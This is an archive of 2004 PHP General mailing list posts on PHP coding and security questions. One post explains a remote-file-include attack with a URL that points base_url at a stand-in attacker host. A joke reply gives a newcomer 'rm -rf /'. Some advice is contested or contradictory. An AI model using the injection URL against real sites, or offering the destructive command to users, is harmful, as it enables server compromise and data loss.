*.pdf But to be sure the browser can't mess up, I'll cheerfully for image to be a PHP script and foo.jpg is just in the PATH_INFO, or for a one-off, force progress_meter.jpg to be a PHP script. I can't begin to estimate the number of hours I've wasted on browser bugs with rich media where they browser used the URL to do something incredibly stupid instead of just taking the valid data being sent and doing the right thing. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Close all open tags in HTML text
Richard Lynch wrote: Matt Palermo wrote: I am allowing users to imput HTML code into a textarea. After they input this, I wany to output their HTML to the browser. In order for the document to be safe, I need to close all open HTML tags that have been left open by the user, along with any open comments. Is there a way to take an HTML string and add closing tags and comments to it if needed? After you use http://php.net/tidy to fix the HTML, use http://php.net/strip_tags to rip out all but the handful of tags you really want to allow them to use, most especially any JavaScript they might shove in to attack your (and my!) server. I *think* strip_tags rips out JavaScript. RTFM to be sure. not really, but it removes script and /script so javascript is not interpreted. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: PHP Security
Chris Shiflett wrote: --- Greg Donald [EMAIL PROTECTED] wrote: http://seclists.org/lists/security-basics/2004/Dec/0080.html Most of this is actually true. The one statement that is unclear is the following: There are two kinds of flaws : - flaws inherent to the php langage itself, as seen before, in file uploads. - danger in uploading files at all on the server, not dependent on the langage used to handle the actual upload, but regarding the potential execution of uploaded files. This may have meant meant hypothetically, meaning that there are two areas where flaws could potentially exist - in the language or in the code. If this was meant to suggest that there are existing flaws in the language, then this is never justified. I didn't find the statemtn to be unclear: that kind of flaw can exist, and it has been seen. There was, unless I've been severely misinformed, a file upload security bug in a PHP 4 Beta (possibly even Release Candidate). Did it make it to release? I'm sure anybody on this list can dig out that answer as fast as I, so I won't. You'll learn more finding out for yourself anyway. Now, granted, that flaw was fixed IMMEDIATELY. And, granted, a SysAdmin who chooses to put Beta software on a server is responsible for the inherent risks involved. The point, however, that such potential flaws can exist, and could remain undetected even now in stable, released code (even PHP) is valid. I personally don't *believe* such flaws could have survived the scrutiny after the known problems were suffered by the PHP Development Team. But I don't think any professionial will claim that it's impossible for them to exist. PS For the inexperienced reader: This is, as far as I know, the ONLY known security flaw in actual PHP C source code to get anywhere near release form. But PHP is a powerful tool, and there are innumerable ways it can be used, mis-used, and just plain abused by yourself to make your own server insecure. Do the best you can to figure out how and when, and you'll do all right. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Question:maybe urldecode
--- Richard Lynch [EMAIL PROTECTED] wrote: Then your new script is broken, as clearly the GET paramters *ARE* there. Sorry, I'm not following you. Where are my GET parameters ? The way I've built my present script is the reults page is grabbing the parameters. Do I need to set up GET parameters in the first/search page ? Is the new script on a different server or in a different directory? Perhaps with register_globals turned OFF? No , same server, The new scripts are in a different directory then the previous one. They are not related or call to each other.Register_globals are set to ON. I don't mean to drag this out as I have my work cut out for me. I did want to add a few more factors that perhaps is preventing this script from doing the things I want. The first search / results form (the one that works): a: is really proprietary code which is why I want to dump it b: It was created as one page and then I broke the grid(results) portion off, so: c: In the new scripts the search and results were created seperately and most of the code is in the results page. What I'm saying is in the search form, all that exists is the form elements themselves and some resultsets that feed the multi select lists and menu drop downs. The results page, has the resultset for formulating the return records, but it also has the query string code that grabs the parameters explodes and implodes them. I'm wondering if perhaps I need some of this code in the search page. I wouldn't be throwing this out again, as the scripts work, but it's that I need to get the query string back into the search form and have it display the parameters there. I don't even know if that is a standard function of search pages. I've done some googling but have not come up with something that addresses this type of functionality. Stuart -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Implementing database cache.
Bruno B B Magalhães wrote: does anybody have am idea of witch are the required functions to implement a database query cache? I have a very nice and fast database layer, witch I use in all my projects (about 19 sites and a lot of others hot-sites and systems like intranet and extranets). Here is my idea of the functions: is_cached(); read_cache(); clear_cache(); write_cache(); And what is the fastest way, shared memory perhaps? And I would have to use serialize function to store query results right? and about the cache name (or cache_id whatever) I was thinking about using a md5 hash of the query itself. I would love any ideas! :) 1. Rolling your own database cache is probably not a fruitful exercise, except as a learning experience. Honest. The database vendors already have a cache you can use, and you're not going to beat their performance with your own in any kind of reasonable development time-frame. 2. You can't serialize the objects, connection, or result, from MySQL functions. I'm 100% certain of the connection object, and 99.9% certain of the result set object. Those objects go invalid when a script ends, no matter how you try to save them. You'll have to suck out all the data and store that. 3. Shared memory, last time I checked, was a real [bleep] to use because of a race condition in getting a unique name/semaphore for the storage space on a server-wide basis. Maybe this has changed since I last looked, but back in the day, you were taking the risk that your PHP shared memory would get trashed by, say, Perl using shared memory. Or any other application that wanted to use shared memory. I *hope* this has been fixed, for your sake, but be sure you read up on it. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] How to make a PHP Socket client crash-proof?
Have you completely eliminated the possiblity of having a second, independent, completely unrelated client/socket which is used to *SEND* data to the server? client_get -- server client_send --- server They can both use your local database to share data, to whatever degree you deem necessary, but having one-way sockets for two different scripts is way more easier than trying to get a two-way socket to work, in my (limited) experience. If you MUST push forward with a two-way socket, try to determine the state of the world inside your infinite loop. Why aren't you breaking out of that loop? Can you do *anything* to break out? I suspect that once you have started SENDING data to the server, it's going to just keep waiting for you to send more. How do you signal the end of your data to be sent? Does the server understand that signal? -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Pass mysql array into SESSION?
Jerry Swanson wrote: I want to pass an array from one page to excell generation page. I tried to pass through session($_SESSION['sql'] = $var). But value is not set. The array is actually $result = mysql_query($query); The result from mysql_query() is not an array. It's a MySQL result reference. It is tied, by its nature, to the MySQL link (connection) object from mysql_connect. Neither the result objects, nor the link object, can survive the end of a PHP script, for technical reasons. Actually, maybe some day somebody can make this work, but it would be real [bleep]. Plus, you'd really only want to use this in extreme circumstances, despite the seemingly obvious bonus of expensive database connections surviving for true re-use. Anyway, back to the more mundane level of your problem: Use mysql_fetch_array (or mysql_fetch_row, or whatever) to actually get the content you need, and you can save that in your session. Depending on how much data you are saving, and how large the strings are (War and Peace?) you might actually be better off just re-doing the query in the next script. You'll have to test on *YOUR* data on *YOUR* server to be sure either way. Too many variables render anybody else's data (mostly) meaningless. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] fread()
Russell P Jones wrote: Is there any way to use fread() or a similar function to read a section of a document NOT starting at the beginning... for example, I can read the first 1000 bytes of a document with fread($doc, 1000); Is there any way to read the second 1000 bytes? perhaps, fread($doc, 1000, 2000); who knows or would substr work? substr would work but performance would most likely suck. Perhaps you are seeking http://php.net/fseek :-p -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Confused - $GLOBALS
My best guess from skimming your code is that you need: global $_POST; in the function that uses $_POST. Or is $_POST always global anyway? I always forget, because they changed it around on POST/GLOBALS/etc at some point, but only on some of them. Grrr. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Confused - $GLOBALS
On Thu, 2004-12-09 at 12:40 -0800, Richard Lynch wrote: My best guess from skimming your code is that you need: global $_POST; should I put this at the top of my code with the rest of my variables? in the function that uses $_POST. Or is $_POST always global anyway? No. I always forget, because they changed it around on POST/GLOBALS/etc at some point, but only on some of them. Grrr. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Confused - $GLOBALS
On Thu, 2004-12-09 at 15:39 -0500, Roger Spears wrote: Danny Brow wrote: On Thu, 2004-12-09 at 13:41 -0500, John Nichel wrote: Danny Brow wrote: Below is a snip of a program I am writing, I am a little new to php. Any how, I can't for the life me figure out why one of my functions cannot grab the item_pics1 variable. I have tried passing the variable to the function, tried using $GLOBALS['item_pic1']. So I guess my question is, does PHP in some cases need to have a variable in a if statement sent back to the global scope? everything works but the str_replace item_pics1. Hope this is enough code. This may seem a little simple, but it's happened to me. Are you sure the variable has a value? Yes, I can do a print $item_pics before and after the function. dan. PS. Roger, sorry for sending this to you twice, you sent your reply to directly and not to the list. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Confused - $GLOBALS
On Thu, 2004-12-09 at 12:40 -0800, Richard Lynch wrote:
My best guess from skimming your code is that you need:
global $_POST;
in the function that uses $_POST.
Or is $_POST always global anyway?
I always forget, because they changed it around on POST/GLOBALS/etc at
some point, but only on some of them. Grrr.
After reading this again, the function does not use $_POST at all.
here it is again.
function html_template() {
global $item_pics1;
if (file_exists('item.html')) {
print This is item_pics1 . $item_pics1;
$html_template = $GLOBALS['html_template'];
$html_template = str_replace('{item_pictures}', $item_pics1,
$html_template);
$html_template = str_replace('{title}', $GLOBALS['title'],
$html_template);
$html_template = str_replace('{description}',
$GLOBALS['descrip'], $html_template);
$html_template = str_replace('{price}', $GLOBALS['price'],
$html_template);
$item_file_name = $GLOBALS['root_dir'] . / . $GLOBALS['dir'] .
/item.html;
$item_fh = fopen($item_file_name, 'x+');
fwrite($item_fh, $html_template);
} else {
$GLOBALS['errors'] .= item.html template does not exsit;
}
}
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: PHP Security
Richard Lynch wrote: Chris Shiflett wrote: --- Greg Donald [EMAIL PROTECTED] wrote: http://seclists.org/lists/security-basics/2004/Dec/0080.html Most of this is actually true. The one statement that is unclear is the following: There are two kinds of flaws : - flaws inherent to the php langage itself, as seen before, in file uploads. - danger in uploading files at all on the server, not dependent on the langage used to handle the actual upload, but regarding the potential execution of uploaded files. This may have meant meant hypothetically, meaning that there are two areas where flaws could potentially exist - in the language or in the code. If this was meant to suggest that there are existing flaws in the language, then this is never justified. I didn't find the statemtn to be unclear: that kind of flaw can exist, and it has been seen. There was, unless I've been severely misinformed, a file upload security bug in a PHP 4 Beta (possibly even Release Candidate). Did it make it to release? I'm sure anybody on this list can dig out that answer as fast as I, so I won't. You'll learn more finding out for yourself anyway. snip I'm pretty sure Chris is one who doesn't have to dig to find out about an old security flaw. -- John C. Nichel ÜberGeek KegWorks.com 716.856.9675 [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Confused - $GLOBALS
On Friday 10 December 2004 04:48, Danny Brow wrote: On Thu, 2004-12-09 at 12:40 -0800, Richard Lynch wrote: My best guess from skimming your code is that you need: global $_POST; should I put this at the top of my code with the rest of my variables? No in the function that uses $_POST. Or is $_POST always global anyway? No. Yes -- Jason Wong - Gremlins Associates - www.gremlins.biz Open Source Software Systems Integrators * Web Design Hosting * Internet Intranet Applications Development * -- Search the list archives before you post http://marc.theaimsgroup.com/?l=php-general -- /* BOFH Excuse #227: Fatal error right in front of screen */ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Confused - $GLOBALS
Danny Brow wrote:
snip
function html_template() {
global $item_pics1;
if (file_exists('item.html')) {
print This is item_pics1 . $item_pics1;
$html_template = $GLOBALS['html_template'];
$html_template = str_replace('{item_pictures}', $item_pics1,
$html_template);
$html_template = str_replace('{title}', $GLOBALS['title'],
$html_template);
$html_template = str_replace('{description}',
$GLOBALS['descrip'], $html_template);
$html_template = str_replace('{price}', $GLOBALS['price'],
$html_template);
$item_file_name = $GLOBALS['root_dir'] . / . $GLOBALS['dir'] .
/item.html;
$item_fh = fopen($item_file_name, 'x+');
fwrite($item_fh, $html_template);
} else {
$GLOBALS['errors'] .= item.html template does not exsit;
}
}
So what is the function doing or not doing? If 'index.html' isn't in
the same directory as the script, it will evaluate to false and the only
code the function will execute is...
$GLOBALS['errors'] .= item.html template does not exsit;
Maybe do a print_r ( $GLOBALS ) inside the function to make sure the
values you're looking for are actually there.
--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Confused - $GLOBALS
On Friday 10 December 2004 04:52, Danny Brow wrote:
OK, you never said what your problem was except to say everything works but
the str_replace item_pics1.
Did you check $GLOBALS['errors'] after calling this function?
function html_template() {
global $item_pics1;
if (file_exists('item.html')) {
Is this file supposed to be same as the one below?
$item_file_name = $GLOBALS['root_dir'] . / . $GLOBALS['dir'] .
/item.html;
--
Jason Wong - Gremlins Associates - www.gremlins.biz
Open Source Software Systems Integrators
* Web Design Hosting * Internet Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
We are all dying -- and we're gonna be dead for a long time.
*/
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] allow_url_fopen ini directive not enough
OK, apologies on my part, I did not correctly explian the problem which can and has arisen from remote includes. I'll try to explain the problem that I have come across twice in the last couple of years both with popular software packages that I downloaded like thousands of others and both with exactly the same vunerability and both resulted in my site being comprimised and having to resort to backups. The vunerability occurred where both applications had a variable setting a base directory of the source code, which was used when including files throughout the application, i.e.: $base_url = '/home/example.com/www'; include_once ($base_url.'/config.php'); In config.php you would then have, for example: ?php include_once ($base_url.'/whatever.php'); ... ? Now in each instance register globals was on and all that was needed to comprimise the site was to have a variable passed in the url to set the base url to a remote site, which in turn output php to execute, i.e.: http://example.com/config.php?base_url=http://myhacksite.example.com Now, you are correct that education on how to avoid this kind of issue is key, however that does not avoid the problem. Turning of register globals would prevent many of these attacks, however there are still many apps out there that require register globals to be on and there are other ways to use this exploit with them off. Now all I'm saying is that given the potential for damage and , from my point of view, the little improvement that this feature actually provides, why would you NOT have a way of disabling it. I would if I could, and I know of others who would as well. Any thoughts? KJ PS: If you gave someone that you didn't trust access to your scripts then you're asking for trouble, that was not my point and was not part of any kind of thinking towards this request. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] How to post quote/double quote mark?
Hi,
I used the following function to post a string variable abcdef to a PHP
program on another host:
?php
function PostToHost($host, $path, $data_to_send) {
$fp = fsockopen($host,80);
if(!$fp) {
echo Failed to open port;
exit;
}
fputs($fp, POST $path HTTP/1.1\n);
fputs($fp, Host: $host\n);
fputs($fp, Content-type: application/x-www-form-urlencoded\n);
fputs($fp, Content-length: .strlen($data_to_send).\n);
fputs($fp, Connection: close\n\n);
fputs($fp, $data_to_send\n);
$res = ;
while(!feof($fp)) {
$res .= fgets($fp, 128);
}
fclose($fp);
return $res;
}
$x = A = \abcdef\;
$y= PostToHost02(host/name, /path/to/test.php, $x);
echo $y;
?
/path/to/test.php on host/name is as follows.
?php
echo $_POST['A'];
?
It seemed that test.php got \abcdef\, instead of abcdef. Could anyone
please tell me how to pass abcdef to test.php?
Thanks in advance.
-Minghua
[PHP] Forms and viewing Text Area
I have a form which has a text box which then stores in MySQL. When I write seperate paragraphs and try and then view what I wrote it lumps it all together in one paragraph when I echo. I am sure I am doing something simply wrong. Anyone have any ideas? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Forms and viewing Text Area
Ben C wrote: I have a form which has a text box which then stores in MySQL. When I write seperate paragraphs and try and then view what I wrote it lumps it all together in one paragraph when I echo. I am sure I am doing something simply wrong. Anyone have any ideas? put pre tag around it. and don't forget htmlspecialchars(): echo 'pre' . htmlspecialchars($input) . '/pre'; -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Forms and viewing Text Area
Ben C wrote: I have a form which has a text box which then stores in MySQL. When I write seperate paragraphs and try and then view what I wrote it lumps it all together in one paragraph when I echo. I am sure I am doing something simply wrong. Anyone have any ideas? The line breaks are preserved. If you look at the HTML source of your page, you'll see that. HTML does not render line breaks, though, you need br / tags. So using nl2br() or something similar would work. -- ---John Holmes... Amazon Wishlist: www.amazon.com/o/registry/3BEXC84AB3A5E/ php|architect: The Magazine for PHP Professionals www.phparch.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] baffled - please explain
Hi,
I just came across a sniplet of code in a book I'm reading and I'm not
sure what point the author is trying to make.
The code is:
function my_function ( )
{
echo 'My function was called';
}
?php
function my_function ( )
{
?
My function was called
?php
}
?
What are those single opening and closing curly braces doing in
separate ?php ? tag blocks? What's the point?
The author says Withing a function, curly braces enclose the code
that performs the task you require. Between these braces, you can have
anything that is legal elsewheere in a PHP script - PHP and MySQL Web
Development, 3rd Edition: Welling Thomson.
If the point is to illustrate what this quote says, does that mean...
{
?
My function was called
?php
}
...is a syntactically correct code block for my_function?
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] baffled - please explain
Malcolm Mill wrote:
Hi,
I just came across a sniplet of code in a book I'm reading and I'm not
sure what point the author is trying to make.
The code is:
function my_function ( )
{
echo 'My function was called';
}
?php
function my_function ( )
{
?
My function was called
?php
}
?
What are those single opening and closing curly braces doing in
separate ?php ? tag blocks? What's the point?
The author says Withing a function, curly braces enclose the code
that performs the task you require. Between these braces, you can have
anything that is legal elsewheere in a PHP script - PHP and MySQL Web
Development, 3rd Edition: Welling Thomson.
If the point is to illustrate what this quote says, does that mean...
{
?
My function was called
?php
}
...is a syntactically correct code block for my_function?
It is correct but it is not suggested.
The author want to show to you instead of using echo 'My function was
called', you can do in that way.
but
{
?
My function was called
?php
}
is not correct :)
best regards
adwin
www.kuya-kuya.net
www.e-rhema.net
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] ISP snippet
i need help to figure out the isp of a user. can anyone help me with this? -Brad www.BradTechnologies.com 99.9% Uptime 24/7 Support Packages as low as 3.50 p/month! www.BradTechnologies.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: PHP Security
the best security practice is to store the jpg file or any other uploaded file in your mySql database. This way you never have to worry about someone executing php by the url like www.example.com/pic.jpg. To view the file, the user would type www.example.com/veiw.php?fileID=3425433345. You can also keep information about the file uploaded in your mysql such as IP address. I cann't really see any security problems here. From: John Nichel [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Re: [PHP] Re: PHP Security Date: Thu, 09 Dec 2004 15:53:50 -0500 MIME-Version: 1.0 Received: from pb1.pair.com ([216.92.131.4]) by mc5-f30.hotmail.com with Microsoft SMTPSVC(5.0.2195.6824); Thu, 9 Dec 2004 13:36:24 -0800 Received: (qmail 37281 invoked by uid 1010); 9 Dec 2004 20:53:56 - Received: (qmail 36970 invoked by uid 1010); 9 Dec 2004 20:53:55 - X-Message-Info: JGTYoYF78jEvCuJhLNo8y5HpJ5uTOZsH Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm Precedence: bulk list-help: mailto:[EMAIL PROTECTED] list-unsubscribe: mailto:[EMAIL PROTECTED] list-post: mailto:[EMAIL PROTECTED] Delivered-To: mailing list [EMAIL PROTECTED] Delivered-To: [EMAIL PROTECTED] Delivered-To: [EMAIL PROTECTED] User-Agent: Mozilla Thunderbird 0.9 (X11/20041103) X-Accept-Language: en-us, en References: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Return-Path: [EMAIL PROTECTED] X-OriginalArrivalTime: 09 Dec 2004 21:36:24.0772 (UTC) FILETIME=[21F88840:01C4DE37] Richard Lynch wrote: Chris Shiflett wrote: --- Greg Donald [EMAIL PROTECTED] wrote: http://seclists.org/lists/security-basics/2004/Dec/0080.html Most of this is actually true. The one statement that is unclear is the following: There are two kinds of flaws : - flaws inherent to the php langage itself, as seen before, in file uploads. - danger in uploading files at all on the server, not dependent on the langage used to handle the actual upload, but regarding the potential execution of uploaded files. This may have meant meant hypothetically, meaning that there are two areas where flaws could potentially exist - in the language or in the code. If this was meant to suggest that there are existing flaws in the language, then this is never justified. I didn't find the statemtn to be unclear: that kind of flaw can exist, and it has been seen. There was, unless I've been severely misinformed, a file upload security bug in a PHP 4 Beta (possibly even Release Candidate). Did it make it to release? I'm sure anybody on this list can dig out that answer as fast as I, so I won't. You'll learn more finding out for yourself anyway. snip I'm pretty sure Chris is one who doesn't have to dig to find out about an old security flaw. -- John C. Nichel ÜberGeek KegWorks.com 716.856.9675 [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] How do you work this thing
How does this work?
RE: [PHP] How do you work this thing
Wil Hitchman mailto:[EMAIL PROTECTED] on Thursday, December 09, 2004 4:40 PM said: How does this work? It needs two D size batteries. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] How do you work this thing
On Thu, 9 Dec 2004 16:42:20 -0800, Chris W. Parker [EMAIL PROTECTED] wrote: Wil Hitchman mailto:[EMAIL PROTECTED] on Thursday, December 09, 2004 4:40 PM said: How does this work? It needs two D size batteries. Or three C size batteries, depending on what the heck he is on about. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] ISP snippet
Brad Ciszewski wrote: i need help to figure out the isp of a user. can anyone help me with this? Maybe you can ask the user real nice. -- By-Tor.com ...it's all about the Rush http://www.by-tor.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] How do you work this thing
Wil Hitchman wrote: How does this work? rm -rf / -- By-Tor.com ...it's all about the Rush http://www.by-tor.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] How do you work this thing
On Thu, 2004-12-09 at 19:59, Rory Browne wrote: On Thu, 9 Dec 2004 16:42:20 -0800, Chris W. Parker [EMAIL PROTECTED] wrote: Wil Hitchman mailto:[EMAIL PROTECTED] on Thursday, December 09, 2004 4:40 PM said: How does this work? It needs two D size batteries. Or three C size batteries, depending on what the heck he is on about. No, no, no, we want to keep the earth clean... a dynamo and pedals ought to give him an unlimited renewable energy source. Cheers, Rob. -- .. | InterJinn Application Framework - http://www.interjinn.com | :: | An application and templating framework for PHP. Boasting | | a powerful, scalable system for accessing system services | | such as forms, properties, sessions, and caches. InterJinn | | also provides an extremely flexible architecture for | | creating re-usable components quickly and easily. | `' -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Spurious newlines when requesting empty php file
Some strange results with spurious newlines inserted in the response when requesting a php file has led me to investigating what happens when a completely empty php-file is requested. I would have thought that the response from a empty php file would also be empty, but, to my surprise, they consist of 3 newlines !!! The strange thing is that I observed this behaviour on two completely unrelated servers. Is this what can be expected or is it a result of misconfiguration ? Kind regards, Carl Michael Skog -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] ISP snippet
I can't help but wonder if an ip trace rte could be used to help identify the ISP? Or Perhaps using a whois,,, doesn't some versions of whois use IP address? Intriguing question,,, Warren Vail -Original Message- From: John Nichel [mailto:[EMAIL PROTECTED] Sent: Thursday, December 09, 2004 5:04 PM To: [EMAIL PROTECTED] Subject: Re: [PHP] ISP snippet Brad Ciszewski wrote: i need help to figure out the isp of a user. can anyone help me with this? Maybe you can ask the user real nice. -- By-Tor.com ..it's all about the Rush http://www.by-tor.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Forms In PHP
Hi, I created a web form in PHP and used a couple of email addresses. The only email address that worked when I submitted to the form (for testing purposes) was my Yahoo address. My AOL, hotmail and other work addresses did not work. Can someone tell me why? Thanks, Wil
[PHP] Re: How to post quote/double quote mark?
Hi, because your magic_quotes_gpc = on, so, do this:
$A = stripslashes($_POST['A']);
here is a function I use , maybe useful for you:
function returnInfo($info) {
if (!get_magic_quotes_gpc()) {
if (is_array($info)) {
$info = array_map(trim, $info);
return array_map(htmlspecialchars, $info);
} else {
return htmlspecialchars(trim($info));
}
} else {
if (is_array($info)) {
$info = array_map(trim, $info);
$info = array_map(htmlspecialchars, $info);
return array_map(stripslashes, $info);
} else {
return stripslashes(htmlspecialchars(trim($info)));
}
}
}
Minghua Yao wrote:
Hi,
I used the following function to post a string variable abcdef to a PHP program on another host:
?php
function PostToHost($host, $path, $data_to_send) {
$fp = fsockopen($host,80);
if(!$fp) {
echo Failed to open port;
exit;
}
fputs($fp, POST $path HTTP/1.1\n);
fputs($fp, Host: $host\n);
fputs($fp, Content-type: application/x-www-form-urlencoded\n);
fputs($fp, Content-length: .strlen($data_to_send).\n);
fputs($fp, Connection: close\n\n);
fputs($fp, $data_to_send\n);
$res = ;
while(!feof($fp)) {
$res .= fgets($fp, 128);
}
fclose($fp);
return $res;
}
$x = A = \abcdef\;
$y= PostToHost02(host/name, /path/to/test.php, $x);
echo $y;
?
/path/to/test.php on host/name is as follows.
?php
echo $_POST['A'];
?
It seemed that test.php got \abcdef\, instead of abcdef. Could anyone please tell me
how to pass abcdef to test.php?
Thanks in advance.
-Minghua
--
-- ShenKong ([EMAIL PROTECTED])
-- http://www.openphp.cn
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Close all open tags in HTML text
I would like to leave any HTML in there, but just make sure that ending tags exist, so it doesn't screw up the rest of the page. Strip tags would just wipe out the HTML rather than allowing it and ending it safely. Richard Lynch [EMAIL PROTECTED] wrote in message news:[EMAIL PROTECTED] Matt Palermo wrote: I am allowing users to imput HTML code into a textarea. After they input this, I wany to output their HTML to the browser. In order for the document to be safe, I need to close all open HTML tags that have been left open by the user, along with any open comments. Is there a way to take an HTML string and add closing tags and comments to it if needed? After you use http://php.net/tidy to fix the HTML, use http://php.net/strip_tags to rip out all but the handful of tags you really want to allow them to use, most especially any JavaScript they might shove in to attack your (and my!) server. I *think* strip_tags rips out JavaScript. RTFM to be sure. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re[2]: [PHP] How do you work this thing
Hi, Friday, December 10, 2004, 11:05:50 AM, you wrote: RC No, no, no, we want to keep the earth clean... a dynamo and pedals ought RC to give him an unlimited renewable energy source. Maybe he has one with pedals and that's what he can't get to work? -- regards, Tom -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: PHP Security
--- I l [EMAIL PROTECTED] wrote: the best security practice is to store the jpg file or any other uploaded file in your mySql database. This way you never have to worry about someone executing php by the url like www.example.com/pic.jpg. To view the file, the user would type www.example.com/veiw.php?fileID=3425433345. That's the best? :-) While I have a great deal of confidence in my code as well, I find it odd that you trust your own PHP code more than something like Apache, which has been tested by millions of people worldwide and is very mature. I would argue that it's more likely that you'll make a mistake in view.php than it is that you will misconfigure Apache to process images as PHP. Security is all about knowing what you can trust and what you cannot. A mistrust of everything (paranoid security) is not a good solution, and when there is a choice, the one with less risk is more secure. In this case, I don't agree with your decision. I would put my trust in Apache. I cann't really see any security problems here. There are security concerns with everything, even if they're hypothetical (e.g., even when you can't discover an exploit). Be careful not to ever get too comfortable. :-) Chris = Chris Shiflett - http://shiflett.org/ PHP Security - O'Reilly HTTP Developer's Handbook - Sams Coming Soon http://httphandbook.org/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] I'm Back i'm beginner and i couldn't solve the problem
hi again, I tried all the corrections that you showed me. Nothing worked and I uploaded my scripts to a web hosting server and I saw that my scripts run on that server quiet well. Every script works on my machine, if I dont use $_POST[]. For example if I try to run that code: ?php echo 'This is a stringbr'; echo 'Arnol said that: I\'ll be backbrbr'; ? It runs, there is no problem, but if I run that one: ?php print Welcome b $_POST[user] /b P\n\n; print Your address is:P\n\n b $_POST[address] /b; ? Only Welcome and Your address is printed. The data that I enter into the form is not received. Do you have any idea, what kind of configuration mistake that I've done? - Do you Yahoo!? Read only the mail you want - Yahoo! Mail SpamGuard.
Re: [PHP] I'm Back i'm beginner and i couldn't solve the problem
10 2004 05:57 Mecnun (a): hint - php.ini - register_globals = Off
